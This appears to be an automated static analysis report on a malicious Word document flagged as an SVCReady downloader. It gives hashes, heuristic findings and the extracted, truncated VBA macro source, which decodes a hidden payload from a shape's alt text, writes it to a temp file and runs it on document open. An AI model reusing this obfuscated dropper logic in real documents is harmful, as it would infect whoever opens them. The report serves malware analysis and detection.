Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e4aecb7ffc7c53d8…

MALICIOUS

Office (OOXML)

Size: 115.2 KB
Created: 2020-07-23 09:17:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-09-07
MD5: a4d2dad881bf1caf7a1bf352b469b711
SHA-1: 4b37d59f2a417823948493c679b1e07943e8bacf
SHA-256: e4aecb7ffc7c53d86191864ee60fe6c9e59d0d8250ce0412e69d29de8a4fab73
Risk Score: 210

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is an OOXML document containing a VBA macro with an AutoOpen subroutine. This macro uses WshShell.exec to run a file named '1.jpg' located in the temporary directory. The macro also constructs the path to this file using Environ("tmp"), which resolves to the user's temporary directory. This indicates the document is designed to download and execute a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
  • External relationship (high) OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
  • VBA project inside OOXML (medium, 3 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low) OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (OOXML external relationship)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/ink (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2017/model3d (OOXML external relationship)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (OOXML external relationship)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (OOXML external relationship)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (OOXML external relationship)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2012/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2018/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2006/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (OOXML external relationship)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 4792 bytes
  SHA-256: 61d97b569a1407a24a19304cbbc32be8bc1fbcd1dfa7208a9ed6558836bfe3c2
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bbc79467"
Function a016c332()
a016c332 = ActiveWindow.DisplayLeftScrollBar
End Function
Function ca09aeed()
ca09aeed = ActiveWindow.Left
End Function
Function bbae29b5()
bbae29b5 = 10744.411065918
End Function
Function cbc4d8e4()
cbc4d8e4 = Application.ActiveDocument.AttachedTemplate
End Function
Sub AutoOpen()
Dim d3f0c64c As New dcb13349
aaa = c891bee4(d13fa101)
b196ad7f = d3f0c64c.d2c1fced(aaa, "")
ae610e55 eb6f8b4e, b196ad7f
Dim b034ccb1 As New WshShell
Call b034ccb1.exec(ecde239a & " " & eb6f8b4e)
End Sub

Attribute VB_Name = "f9f3fb37"
Function db0feade()
db0feade = ActiveWindow.HorizontalPercentScrolled
End Function
Function b31ce60b()
b31ce60b = ActiveWindow.StyleAreaWidth
End Function
Function d8cd4856()
d8cd4856 = 17508 / 6
End Function
Function d0d048c9()
d0d048c9 = ActiveWindow.HorizontalPercentScrolled
End Function
Sub ae610e55(f0a0a2c3, cf1076eb)
Dim dc2058c8
dc2058c8 = FreeFile
Open f0a0a2c3 For Output As #dc2058c8
Print #dc2058c8, b3062764(cf1076eb)
Close #dc2058c8
End Sub
Function eb6f8b4e()
eb6f8b4e = Environ("tmp") & "\1.jpg"
End Function
Function a21a5d01()
a21a5d01 = ActiveWindow.VerticalPercentScrolled
End Function
Function f65e87ab()
f65e87ab = "Misplace gondolas delegation windowless dilemma"
End Function
Function f6d6392f()
f6d6392f = 41114.073787526
End Function
Function d58d4d56(bdf5b14cnp As String) As Boolean
If 509 > Len(bdf5b14cnp) Then
d58d4d56 = False
End If
End Function
Function c891bee4(da260a86)
For a950a1bb = 1 To Len(da260a86) Step 3
cbf611e4 = cbf611e4 & Mid(da260a86, a950a1bb, 1)
Next
c891bee4 = cbf611e4
End Function
Function a36723a7()
a36723a7 = "ajHLBqi"
End Function
Function c04c394e()
c04c394e = ActiveWindow.DisplayVerticalRuler
End Function
Function c47655c4()
c47655c4 = ActiveWindow.SplitVertical
End Function
Function a6c5678b()
a6c5678b = 1453294464 / 28736
End Function
Sub ba4b90ba()
End Sub
Function b19494bc()
b19494bc = 56
End Function
Function c3893206()
c3893206 = ActiveWindow.View
End Function
Function d56315d1()
d56315d1 = ActiveWindow.Height
End Function
Function c3d2ac9a()
c3d2ac9a = ActiveWindow.Index
End Function
Function b3062764(cf1076eb)
b3062764 = StrConv(cf1076eb, 64)
End Function
Function a8c38f44()
a8c38f44 = ActiveWindow.DisplayLeftScrollBar
End Function
Function dcf62b5f()
dcf62b5f = ActiveWindow.HorizontalPercentScrolled
End Function
Function c153b519()
c153b519 = ActiveWindow.Height
End Function
Function f220613f()
f220613f = ActiveWindow.Top
End Function
Function d13fa101()
d13fa101 = ActiveDocument.Shapes(1).AlternativeText
End Function
Function a304ddd3()
a304ddd3 = Application.ActiveDocument.CompatibilityMode
End Function
Function c932ae8a()
c932ae8a = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function bdc742e7()
bdc742e7 = ActiveWindow.HorizontalPercentScrolled
End Function
Function cb793ea6()
cb793ea6 = "Indices enshrine agog happenings"
End Function
Function ecde239a()
ecde239a = c891bee4("rd0e1egf9s9bv31rc738b202")
End Function

Attribute VB_Name = "dcb13349"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function a98983b0() As Long
Dim a224b4f2 As Long
Dim adbc91f9 As Integer
adbc91f9 = 7
For a224b4f2 = 11 To 60
adbc91f9 = adbc91f9 - a224b4f2
Next a224b4f2
a98983b0 = adbc91f9
End Function
Function f198f26f()
f198f26f = Application.ActiveDocument.Application
End Function
Function ed7034a3()
ed7034a3 = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Funct
... (truncated)
Filename: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: word/vbaProject.bin
  Size: 28672 bytes
  SHA-256: cc61cb82c60284f861f55264e58922c6938ccc7f54d5334d9283975f2fa79658